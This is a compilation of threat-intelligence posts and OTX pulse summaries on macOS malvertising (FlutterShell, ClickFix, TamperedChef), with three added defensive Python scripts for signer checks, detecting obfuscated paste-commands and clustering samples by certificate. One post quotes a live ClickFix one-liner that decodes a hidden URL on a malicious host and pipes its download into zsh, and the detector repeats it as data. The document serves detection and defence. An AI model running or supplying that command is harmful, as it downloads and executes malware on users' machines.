Malvertising Campaign Spreads FlutterShell Backdoor to macOS Users

macOS users beware: a sneaky malware called FlutterShell is spreading through malicious ads and infected desktop apps, allowing hackers to take control of your device and steal sensitive data. This stealthy backdoor can execute commands, access files, and even siphon off browser session info - all while masquerading as legitimate software.

https://osintsights.com/malvertising-campaign-spreads-fluttershell-backdoor-to-macos-users?utm_source=mastodon&utm_medium=social

#Macos #Fluttershell #Backdoor #Malware #Malvertising

Malvertising Campaign Spreads FlutterShell Backdoor to macOS Users

Learn how the FlutterShell backdoor infects macOS users through adware and takes control. Discover the malware's capabilities and how to protect your device.

OSINTSights

Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor

Pulse ID: 6a2105954034647e83ac7c6c
Pulse Link: https://otx.alienvault.com/pulse/6a2105954034647e83ac7c6c
Pulse Author: Tr1sa111
Created: 2026-06-04 04:56:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #InfoSec #Mac #MacOS #Malvertising #OTX #OpenThreatExchange #RAT #bot #Tr1sa111

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor

A financially-motivated cybercrime cluster designated CL-CRI-1089 has launched Operation FlutterBridge, deploying FlutterShell backdoor malware targeting macOS systems through malvertising. Built with the Flutter framework, FlutterShell masquerades as legitimate applications including podcast players and PDF viewers, delivering adware with full backdoor capabilities such as shell command execution and file system manipulation. The malware uses a WebView-based architecture with JavaScript-to-native bridge, allowing attackers to dynamically modify behavior without recompiling. Distribution occurs through hundreds of Google-verified advertisements controlled by shell companies including AdsParkPro LTD and Advantage Web Marketing LLC. The campaign primarily targets Anglophone and Western European markets. All samples were signed with valid Apple Developer IDs and successfully passed notarization, achieving zero detections on VirusTotal initially. The malware hijacks Google Chrome browsers, redirecting traffic ...

Pulse ID: 6a1ee9cdd897e06c7cac14d9
Pulse Link: https://otx.alienvault.com/pulse/6a1ee9cdd897e06c7cac14d9
Pulse Author: AlienVault
Created: 2026-06-02 14:33:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Chrome #CyberCrime #CyberSecurity #Europe #Google #InfoSec #Java #JavaScript #Mac #MacOS #Malvertising #Malware #OTX #OpenThreatExchange #PDF #RAT #Rust #Troll #VirusTotal #WesternEurope #bot #AlienVault

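
The pulse above says every FlutterShell sample carried a valid Developer ID signature and passed notarization, so Gatekeeper's verdict on its own tells you nothing about intent; the check a practitioner actually wants is "signed by whom". The script below is an added example, not code from the pulse, from Palo Alto Networks or from the malware authors. It parses the output of `codesign -dv --verbose=4` and `spctl -a -vv` (both tools print their report to stderr) and only returns a trusted verdict when the Team ID matches one you have approved for that bundle identifier. The bundle identifier, the Team IDs and the two sample outputs are constructed placeholders.

```python
import re
import subprocess
import sys

# Team IDs you have approved per bundle identifier. Constructed placeholders:
# populate this from your own software inventory, never from the signature itself.
EXPECTED_TEAM_IDS = {
    "com.example.podcastplayer": {"ABCDE12345"},
}


def parse_codesign(output: str) -> dict:
    """Pull Identifier, the Authority chain and TeamIdentifier out of codesign -dv output."""
    info = {"identifier": None, "authority": [], "team_id": None}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "Identifier":
            info["identifier"] = value.strip()
        elif key == "Authority":
            info["authority"].append(value.strip())
        elif key == "TeamIdentifier":
            info["team_id"] = value.strip()
    return info


def parse_spctl(output: str) -> dict:
    """spctl -a -vv prints '<path>: accepted|rejected' followed by a 'source=' line."""
    accepted = re.search(r":\s*accepted\s*$", output, re.M) is not None
    match = re.search(r"^source=(.*)$", output, re.M)
    source = match.group(1).strip() if match else ""
    return {"accepted": accepted, "notarized": "Notarized" in source, "source": source}


def verdict(codesign_out: str, spctl_out: str) -> str:
    """Gatekeeper acceptance is necessary; a known Team ID is what makes the app trusted."""
    cs = parse_codesign(codesign_out)
    sp = parse_spctl(spctl_out)
    if not sp["accepted"]:
        return "rejected"
    has_dev_id = any(a.startswith("Developer ID Application:") for a in cs["authority"])
    if not has_dev_id or not cs["team_id"]:
        return "accepted-without-developer-id"
    if cs["team_id"] in EXPECTED_TEAM_IDS.get(cs["identifier"], set()):
        return "trusted-team"
    # Valid signature, possibly notarized, from a Team ID you never approved:
    # the FlutterShell case. Signed and notarized is not the same as trusted.
    return "notarized-unknown-team" if sp["notarized"] else "signed-unknown-team"


def check_app(path: str) -> str:
    """Run the real tools on macOS; both write their report to stderr."""
    cs = subprocess.run(["codesign", "-dv", "--verbose=4", path], capture_output=True, text=True)
    sp = subprocess.run(["spctl", "-a", "-vv", path], capture_output=True, text=True)
    return verdict(cs.stderr, sp.stderr)


# Constructed output in the shape the two tools print it; ZZZZZ99999 is a placeholder Team ID.
SAMPLE_CODESIGN = """Executable=/Applications/Podcast Player.app/Contents/MacOS/Podcast Player
Identifier=com.example.podcastplayer
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Authority=Developer ID Application: Example Signer LLC (ZZZZZ99999)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ZZZZZ99999
"""
SAMPLE_SPCTL = """/Applications/Podcast Player.app: accepted
source=Notarized Developer ID
origin=Developer ID Application: Example Signer LLC (ZZZZZ99999)
"""

if __name__ == "__main__":
    if sys.platform == "darwin" and len(sys.argv) > 1:
        print(check_app(sys.argv[1]))
    else:
        print(verdict(SAMPLE_CODESIGN, SAMPLE_SPCTL))  # notarized-unknown-team
```

Run it as `python3 check_signer.py "/Applications/Some App.app"` on a Mac to get the live verdict; anywhere else it evaluates the constructed sample, which comes back `notarized-unknown-team` because Gatekeeper accepts the app but the Team ID is not on the approved list for that bundle identifier. That is the verdict to alert on in an EDR query or an MDM compliance rule, not the presence of a signature.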

Malvertising Campaign Targets macOS with FlutterShell Backdoor

Google swiftly suspended advertiser accounts linked to a massive malvertising campaign that spread a new macOS backdoor, known as FlutterShell, after researchers sounded the alarm. The culprits, tracked by Palo Alto Networks as CL-CRI-1089, used hundreds of verified Google ads and a web of shell companies to deceive ad networks.

https://osintsights.com/malvertising-campaign-targets-macos-with-fluttershell-backdoor?utm_source=mastodon&utm_medium=social

#Macos #Malvertising #FluttershellBackdoor #Clcri1089 #GoogleAds

Malvertising Campaign Targets macOS with FlutterShell Backdoor

Learn how a malvertising campaign delivers a new macOS backdoor via Google Ads and find out who's behind it - read the latest threat analysis now.

OSINTSights

Hackers hijacked thousands of sites to spread ClickFix and FakeUpdate attacks - trusted websites are becoming malware launchpads. Browsing safely now means questioning everything. 🌐⚠️ #Malvertising #SocialEngineering

https://www.bleepingcomputer.com/news/security/hackers-hijack-thousands-of-sites-for-clickfix-and-fakeupdate-attacks/

Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks

A threat actor tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates techniques on compromised sites.

BleepingComputer

The top result for "claude code" on Google right now is malvertising. We are so cooked.

anvil-89[.]com
sites[.]google[.]com/newappclaude.com/clau-ver-un-30

```
# The base64 argument decodes to hxxps://anvil-89[.]com/curl/3a3ec41e474be81cec3a999196bfa8be69a2919b5fdaf7e05da3f57ce6b4aa31 (defanged);
# the echo shows the victim a claude.ai URL while the real download is fetched from that host and piped into zsh.
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh
```

#Cybersecurity #Security #Malvertising #Malware #Google #AdTech #Advertising #ThreatIntelligence #ThreatIntel
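
The one-liner in the post above is the ClickFix shape: the victim reads a plausible URL in the `echo`, while the real fetch target is a base64 string decoded at run time and piped straight into `zsh`. As an added example (not code from the post, from Anthropic or from any vendor), the script below decodes every long base64 literal in a pasted command, compares the hosts the command shows against the hosts it really fetches from, and flags the combination of a decoder and a pipe into an interpreter. The only embedded input is the command quoted in the post, used purely as data; the benign comparison command in the notes is constructed.

```python
import base64
import re
from urllib.parse import urlparse

# A run of base64 alphabet long enough to hide a URL; shorter runs are noise.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# URLs that appear in clear text: this is what the victim reads before pasting.
CLEAR_URL = re.compile(r"https?://[^\s\"'<>)]+")
# The decoder the pattern relies on, and a pipe straight into an interpreter.
DECODER = re.compile(r"(?:openssl\s+base64\s+-d|base64\s+(?:-d|-D|--decode))\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sh|bash|zsh|dash|python3?|perl)\b")

# The command quoted in the post above. It is never executed here; it is input data.
MALVERTISED_COMMAND = r'''echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh'''


def decode_hidden_urls(command: str) -> list[str]:
    """Decode every long base64 literal in the command and keep the ones that are URLs."""
    urls = []
    for literal in B64_LITERAL.findall(command):
        padded = literal + "=" * (-len(literal) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # a hex hash or random token, not base64 text
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def assess(command: str) -> dict:
    """Compare the hosts the command shows with the hosts it actually fetches from."""
    hidden = decode_hidden_urls(command)
    shown_hosts = {urlparse(u).hostname for u in CLEAR_URL.findall(command)} - {None}
    hidden_hosts = {urlparse(u).hostname for u in hidden} - {None}
    uses_decoder = DECODER.search(command) is not None
    pipes = PIPE_TO_SHELL.search(command) is not None
    mismatch = bool(hidden_hosts) and not hidden_hosts <= shown_hosts
    return {
        "hidden_urls": hidden,
        "shown_hosts": sorted(shown_hosts),
        "hidden_hosts": sorted(hidden_hosts),
        "uses_decoder": uses_decoder,
        "pipes_to_shell": pipes,
        "host_mismatch": mismatch,
        # A decoded fetch target piped into an interpreter is the ClickFix shape;
        # a shown host that differs from the real one is the deception on top.
        "suspicious": uses_decoder and pipes and bool(hidden),
        "deceptive": uses_decoder and pipes and mismatch,
    }


if __name__ == "__main__":
    for key, value in assess(MALVERTISED_COMMAND).items():
        print(f"{key}: {value}")
```

On the quoted command this reports one hidden URL on `anvil-89.com`, a shown host of `claude.ai`, and both `suspicious` and `deceptive` set. A plain `curl -fsSL https://example.invalid/install.sh | bash` still pipes into a shell but has no decoder and no hidden URL, so it is neither; the decoder plus the host mismatch is what separates a sloppy installer from a lure. The same logic fits a clipboard monitor or a terminal hook that inspects pasted text before it runs.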

@kitkat_blue @thomasfuchs Are there any good Chromium-based browsers which provide the functionality that most current #Brave users presumably intend to attain by installing Brave?

I need something to recommend or install for clients who want to replace Chrome or Edge with something familiar, while protecting them from #surveillance, #malvertising, and other ad- or tracking-based threats.

A disenshittified Firefox fork + uBlock Origin works for those who are willing to adapt to a slightly different look and feel, but a lot of clients insist (in different words) on maintaining as close to the #Chromium UX as possible.

#privacy

Consumer advocates criticise inadequate action against financial fraud

Get-rich-quick schemes, dubious financial coaching or fake online shops: on the internet, fraud is often behind them. Now the big platforms are coming under scrutiny because of it.

heise online

Tracking TamperedChef Clusters via Certificate and Code Reuse

Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.

Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault

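
The pulse above describes tracking the TamperedChef clusters by certificate and code reuse: samples signed by the same entity, or carrying the same reused component, get grouped even when the app name changes from PDF editor to calendar to compression tool. The script below is an added example of that pivot, not Palo Alto Networks' tooling. It indexes each sample by signer subject, leaf-certificate thumbprint and a code-reuse hash, joins samples that share a value with union-find, and keeps every join as an edge so each cluster can be explained. All sample records, signer names, thumbprints and hashes are constructed placeholders. It also skips any pivot value shared by more than `max_fanout` samples, because a value that common (an intermediate CA, a stock runtime library) would glue every cluster into one.

```python
from collections import defaultdict

# Constructed sample metadata. App names, signer names, certificate
# thumbprints and code-reuse hashes are placeholders, not indicators from the report.
SAMPLES = [
    {"id": "s1", "app": "PDF Editor", "signer": "Alpha Soft LTD",  "cert": "T1", "code_hash": "C1"},
    {"id": "s2", "app": "Calendar",   "signer": "Alpha Soft LTD",  "cert": "T1", "code_hash": "C2"},
    {"id": "s3", "app": "Zip Tool",   "signer": "Beta Apps LLC",   "cert": "T2", "code_hash": "C1"},
    {"id": "s4", "app": "PDF Editor", "signer": "Gamma Media OU",  "cert": "T3", "code_hash": "C3"},
    {"id": "s5", "app": "Notes",      "signer": "Gamma Media OU",  "cert": "T4", "code_hash": "C3"},
    {"id": "s6", "app": "Weather",    "signer": "Delta Tools Inc", "cert": "T5", "code_hash": "C9"},
]
# Pivot on leaf-level facts only: the signing subject, the leaf certificate
# thumbprint and a hash of the reused loader or component.
PIVOTS = ("signer", "cert", "code_hash")


def cluster(samples, pivots=PIVOTS, max_fanout=50):
    """Union-find over samples that share a pivot value; returns (groups, edges)."""
    parent = {s["id"]: s["id"] for s in samples}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    # Index every pivot value to the samples carrying it.
    index = defaultdict(list)
    for s in samples:
        for key in pivots:
            if s.get(key):
                index[(key, s[key])].append(s["id"])

    edges = []  # (sample_a, sample_b, pivot_key, pivot_value): the evidence for each join
    for (key, value), ids in index.items():
        if len(ids) > max_fanout:
            continue  # shared by too many samples to be a meaningful pivot
        for a, b in zip(ids, ids[1:]):
            parent[find(a)] = find(b)
            edges.append((a, b, key, value))

    groups = defaultdict(set)
    for s in samples:
        groups[find(s["id"])].add(s["id"])
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0]), edges


def explain(group, edges):
    """The (pivot, value) pairs that hold one cluster together."""
    members = set(group)
    return {(key, value) for a, b, key, value in edges if a in members and b in members}


if __name__ == "__main__":
    groups, edges = cluster(SAMPLES)
    for g in groups:
        print(g, sorted(explain(g, edges)))
```

With the constructed data, s1 and s2 share a signer and a certificate, s3 shares only a code hash with s1, and the three still land in one cluster; s4 and s5 form a second cluster on signer plus code reuse; s6 stays alone. The `explain` output is what goes into the report, since a cluster is only as strong as the weakest pivot that joined it: a single shared code hash is worth a second look at the component itself before two signers are declared the same operator.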

Malvertisers Exploit Code Signing in TamperedChef Malware Campaigns

Meet the sneaky malware campaign that's been flying under the radar, leveraging polished marketing tactics and code signing to spread its malicious reach - with over 4,000 samples and 100 unique variants uncovered across three distinct clusters of activity.

https://osintsights.com/malvertisers-exploit-code-signing-in-tamperedchef-malware-campaigns?utm_source=mastodon&utm_medium=social

#TamperedchefMalware #CodeSigning #MalwareOperations #Malvertising #PaloAltoNetworks

Malvertisers Exploit Code Signing in TamperedChef Malware Campaigns

Learn how malvertisers exploit code signing in TamperedChef malware campaigns and protect your business from these threats with expert insights and actionable tips now.

OSINTSights